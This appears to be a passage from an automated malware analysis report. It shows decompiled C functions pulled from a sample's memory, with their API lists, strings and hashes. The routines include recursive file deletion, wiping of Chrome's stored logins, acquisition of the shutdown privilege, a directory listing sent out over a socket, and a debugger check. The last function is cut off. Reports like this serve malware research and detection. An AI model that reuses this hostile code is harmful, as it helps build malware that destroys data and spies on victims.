				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465908; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E00417036( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E004170AC( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}






































                              0x004170c0
                              0x004170c3
                              0x004170c5
                              0x004170c7
                              0x004170c7
                              0x004170ca
                              0x004170ce
                              0x004170d1
                              0x004170dc
                              0x004170e1
                              0x004170e1
                              0x004170e5
                              0x004170e8
                              0x004170ed
                              0x004170f8
                              0x004170fa
                              0x004170fc
                              0x00417102
                              0x00417106
                              0x00417108
                              0x00417108
                              0x0041710b
                              0x0041710f
                              0x00417112
                              0x0041711d
                              0x00417122
                              0x00417122
                              0x00417126
                              0x00417129
                              0x0041712e
                              0x00417133
                              0x00417149
                              0x0041714e
                              0x00417296
                              0x00000000
                              0x00417296
                              0x00417154
                              0x00417156
                              0x00417156
                              0x0041715e
                              0x00417161
                              0x00417169
                              0x0041716e
                              0x00417172
                              0x00417182
                              0x00417286
                              0x0041728f
                              0x00417290
                              0x00000000
                              0x00417290
                              0x00417288
                              0x0041728a
                              0x00000000
                              0x0041728a
                              0x00417195
                              0x00417216
                              0x00417216
                              0x00000000
                              0x00417216
                              0x00417197
                              0x0041719f
                              0x004171a1
                              0x004171a1
                              0x004171a4
                              0x004171a7
                              0x004171b2
                              0x004171b4
                              0x004171b7
                              0x004171b7
                              0x004171bb
                              0x004171be
                              0x004171c5
                              0x004171c8
                              0x004171d6
                              0x004171d6
                              0x004171d8
                              0x0041723a
                              0x00417248
                              0x00417248
                              0x0041725d
                              0x00000000
                              0x0041725f
                              0x00417261
                              0x00417263
                              0x00417263
                              0x0041726b
                              0x0041726e
                              0x00417276
                              0x00000000
                              0x0041727b
                              0x0041725d
                              0x004171e7
                              0x00000000
                              0x00000000
                              0x004171f4
                              0x004171fc
                              0x004171fe
                              0x004171fe
                              0x00417206
                              0x00417209
                              0x00417211
                              0x00000000
                              0x00417219
                              0x00417219
                              0x00417222
                              0x00000000

                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 00417143
                              • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 0041717A
                              • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 004171F4
                              • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417222
                              • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 0041722B
                              • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 00417248
                              • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 00417255
                              • GetLastError.KERNEL32(?,0046C518,00000001), ref: 0041727D
                              • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417290
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
                              • Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
                              • Opcode Fuzzy Hash: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
                              • Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A291, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0040A291(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402064(_t20, _t28);
						L0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}













                              0x0040a291
                              0x0040a291
                              0x0040a2b1
                              0x0040a2b6
                              0x0040a2bf
                              0x0040a2d5
                              0x0040a2fb
                              0x0040a2fd
                              0x00000000
                              0x0040a2d7
                              0x0040a2de
                              0x0040a2e1
                              0x0040a2ef
                              0x0040a2f1
                              0x0040a302
                              0x0040a302
                              0x0040a307
                              0x0040a30c
                              0x0040a2e8
                              0x0040a2e8
                              0x0040a2e8
                              0x0040a2e1
                              0x0040a314
                              0x0040a31f

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
                              • GetLastError.KERNEL32 ref: 0040A2D7
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
                              • UserProfile, xrefs: 0040A29D
                              • [Chrome StoredLogins not found], xrefs: 0040A2F1
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 6aee853435ac483f14023e027c3c7d13875ae8ad9aac69c95e16b7da5633f9a1
                              • Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
                              • Opcode Fuzzy Hash: 6aee853435ac483f14023e027c3c7d13875ae8ad9aac69c95e16b7da5633f9a1
                              • Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004132F7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004132F7() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                              0x0041330b
                              0x0041331d
                              0x00413329
                              0x00413335
                              0x0041333c
                              0x00413351

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                              • GetLastError.KERNEL32 ref: 00413342
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
                              • Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044926C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043604F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                              0x00449271
                              0x00449272
                              0x00449279
                              0x0044931d
                              0x0044932b
                              0x00449336
                              0x0044933c
                              0x00449341
                              0x00449343
                              0x00449343
                              0x00449349
                              0x0044934e
                              0x0044934e
                              0x00449338
                              0x00449338
                              0x00000000
                              0x00449338
                              0x0044927f
                              0x00449284
                              0x00000000
                              0x00000000
                              0x0044928a
                              0x0044928f
                              0x00449291
                              0x00449291
                              0x00449297
                              0x00000000
                              0x00000000
                              0x0044929c
                              0x004492b3
                              0x004492b3
                              0x004492bc
                              0x004492be
                              0x00000000
                              0x00000000
                              0x004492c0
                              0x004492c5
                              0x004492c7
                              0x004492c7
                              0x004492cd
                              0x00000000
                              0x00000000
                              0x004492d2
                              0x004492f0
                              0x004492f2
                              0x00449315
                              0x00000000
                              0x0044931a
                              0x00449302
                              0x0044930d
                              0x00000000
                              0x00000000
                              0x0044930f
                              0x00000000
                              0x0044930f
                              0x004492d4
                              0x004492dc
                              0x00000000
                              0x00000000
                              0x004492de
                              0x004492e1
                              0x004492e7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004492e9
                              0x004492eb
                              0x004492ed
                              0x00000000
                              0x004492ed
                              0x0044929e
                              0x004492a6
                              0x00000000
                              0x00000000
                              0x004492a8
                              0x004492ab
                              0x004492b1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004492b1
                              0x004492b7
                              0x004492b9
                              0x00000000

                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
                              • GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
                              • Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441069, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx$@
                              • API String ID: 2299586839-3007343520
                              • Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
                              • Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004410D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00435084), ref: 00441112
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Time$FileSystem
                              • String ID: GetSystemTimePreciseAsFileTime$@
                              • API String ID: 2086374402-2730348301
                              • Opcode ID: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction ID: 905004eebb46221c2d070f6dd192413a4baa945a661a41a47a192c014b97a96b
                              • Opcode Fuzzy Hash: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction Fuzzy Hash: 99E05531B40218F787116F24AC0293FBB60DB88B13B10027AFC0517293D9384E049AEE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004360A3, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E004360A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46a00c; // 0x7df2b874
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0042F21A(_t41);
					_pop(_t62);
				}
				L00431810(_t67,  &_v804, 0, 0x50);
				L00431810(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0042F21A(_t57);
				}
				return L0042F61B(_v8 ^ _t70);
			}




































                              0x004360a3
                              0x004360a3
                              0x004360a3
                              0x004360a3
                              0x004360ae
                              0x004360b3
                              0x004360b5
                              0x004360bd
                              0x004360bf
                              0x004360c2
                              0x004360c7
                              0x004360c7
                              0x004360d3
                              0x004360e6
                              0x004360f4
                              0x004360fa
                              0x00436100
                              0x00436106
                              0x0043610c
                              0x00436112
                              0x00436118
                              0x0043611e
                              0x00436124
                              0x0043612a
                              0x00436131
                              0x00436138
                              0x0043613f
                              0x00436146
                              0x0043614d
                              0x00436154
                              0x00436155
                              0x0043615e
                              0x00436164
                              0x00436167
                              0x0043616d
                              0x0043617a
                              0x00436183
                              0x0043618c
                              0x00436195
                              0x004361a3
                              0x004361a5
                              0x004361ba
                              0x004361c6
                              0x004361c9
                              0x004361ce
                              0x004361dd

                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0043619B
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004361A5
                              • UnhandledExceptionFilter.KERNEL32(?), ref: 004361B2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
                              • Instruction ID: 9cb4660ce58b979cd107c23742a1d206b3c76e673fdfde5e893b08115a718fab
                              • Opcode Fuzzy Hash: 6a5391929d803bd455df93c3db7eef3c223850fa911d3d5d63c768744e45724f
                              • Instruction Fuzzy Hash: 3531057490122DABCB21DF65DC8979DBBB8BF08310F5081EAE40CA7261E7349F858F58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00406176, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E00406176(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(L00401ECB( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E004020B5(_t49,  &_v28);
					E0040425F(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = ".";
					_t29 = L004074E6(__eflags);
					_t50 = _t29;
					L00401ED0();
					__eflags = _t29;
					if(__eflags != 0) {
						L00401FB1( &_v28, ".", _t73, E0040208B(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
						L5:
						L00401FA7();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
						_t34 = E0040208B(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						L00401FB1( &_v28,  &_v28, _t73, L004074F2(_t50,  &_v52,  &_v28, __eflags, _t34));
						L00401FA7();
						goto L5;
					}
					E004020CC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					L00404A6E(_t50, 0x46c2e8, _t71, __eflags);
					L00401FA7();
				} else {
					L00416CF4(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					L00404A6E(_t49, 0x46c2e8,  &_a4, _t77);
				}
				return L00401ED0();
			}














                              0x00406197
                              0x00406199
                              0x0040619c
                              0x004061bf
                              0x004061ce
                              0x004061d3
                              0x004061da
                              0x004061e2
                              0x004061e4
                              0x004061e9
                              0x004061eb
                              0x00406205
                              0x00406244
                              0x00406244
                              0x00406244
                              0x00406257
                              0x00406259
                              0x0040621e
                              0x00406224
                              0x00406234
                              0x0040623c
                              0x00000000
                              0x00406241
                              0x00406264
                              0x00406269
                              0x00406270
                              0x00406278
                              0x0040619e
                              0x004061a6
                              0x004061ab
                              0x004061b2
                              0x004061b2
                              0x0040628a

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00406191
                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00406251
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNextsend
                              • String ID:
                              • API String ID: 4113138495-0
                              • Opcode ID: 2eb6fcb89c8de4bfe866411cf2b728d7e90f918973601a23097cebf8dd26e74c
                              • Instruction ID: da5cdc510f7b1e2dc041b682181fa273f481cbbb57d68fa438c846ee03cac76e
                              • Opcode Fuzzy Hash: 2eb6fcb89c8de4bfe866411cf2b728d7e90f918973601a23097cebf8dd26e74c
                              • Instruction Fuzzy Hash: CD2141719101195ACB14FBA5CC96DEEB738AF51304F40027FF906761D1EF385A498A99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0042E02D, Relevance: 1.8, Strings: 1, Instructions: 504COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E0042E02D(void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void _v72;
				void* _v76;
				void* _v276;
				void _v332;
				void* _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t294;
				intOrPtr _t295;
				unsigned int _t297;
				void* _t299;
				signed int _t301;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				void* _t433;
				void* _t434;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				signed int _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				signed int _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				signed int _t476;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				signed int _t487;
				void* _t506;
				void* _t513;
				void* _t520;
				void* _t527;
				void* _t534;
				void* _t541;
				void* _t548;
				void* _t555;
				unsigned int _t558;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t578;
				signed int _t583;
				signed int _t588;
				signed int _t593;
				signed int _t598;
				void* _t603;

				_t400 = __edx;
				_v12 = 0x30;
				_t301 = 8;
				_v76 = __ecx;
				memcpy( &_v72, __ecx, _t301 << 2);
				_push(0x10);
				_t204 = memcpy( &_v332, _t400, 0 << 2);
				_v40 = _t204;
				do {
					_t558 =  *_t204;
					_t297 =  *(_t204 - 0x34);
					_t401 = 0x13;
					_t205 = L0042DF6A(_t558, _t401);
					_t402 = 0x11;
					_t206 = L0042DF6A(_t558, _t402);
					_t403 = 0x12;
					_t207 = L0042DF6A(_t297, _t403);
					_t404 = 7;
					_t208 = L0042DF6A(_t297, _t404);
					_t209 = _v40;
